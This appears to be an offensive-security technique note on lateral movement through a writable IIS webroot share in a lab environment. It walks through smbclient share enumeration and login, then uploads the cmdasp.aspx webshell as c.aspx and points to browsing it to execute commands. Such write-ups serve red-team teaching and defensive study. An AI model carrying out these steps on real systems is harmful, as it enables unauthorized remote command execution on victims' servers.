offensive security
Shared Webroot
Lateral Movement
Execution
Enumerating victim host
10.0.0.6 for any shares:1
smbclient -L //10.0.0.6 -U spot
2
​
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
​
6
Sharename Type Comment
7
--------- ---- -------
8
ADMIN$ Disk Remote Admin
9
C$ Disk Default share
10
CertEnroll Disk Active Directory Certificate Services share
11
IPC$ IPC Remote IPC
12
NETLOGON Disk Logon server share
13
SYSVOL Disk Logon server share
14
temp Disk
15
tools Disk
16
transcripts Disk
17
wwwroot Disk
Copied!
Logging in to the
wwwroot share:1
smbclient //10.0.0.6/wwwroot -U spot
2
​
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
Try "help" to get a list of possible commands.
6
smb: \> ls
7
. D 0 Sat Aug 25 16:57:52 2018
8
.. D 0 Sat Aug 25 16:57:52 2018
9
aspnet_client D 0 Tue Jul 31 20:11:20 2018
10
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
11
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
Copied!
Uploading a webshell into the
wwwroot:1
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
2
​
3
putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
4
smb: \> ls
5
. D 0 Sat Aug 25 16:59:47 2018
6
.. D 0 Sat Aug 25 16:59:47 2018
7
aspnet_client D 0 Tue Jul 31 20:11:20 2018
8
c.aspx A 1400 Sat Aug 25 16:59:47 2018
9
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
10
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
11
​
12
6463487 blocks of size 4096. 3032260 blocks available
Copied!
Same as above in a picture:
Attacker can now access the newly uploaded webshell via
http://10.0.0.6/c.aspx and start executing commands:
Observations
See T1108: Webshells for observations:
References
https://attack.mitre.org/wiki/Technique/T1051
attack.mitre.org
Last modified 3yr ago
Copy link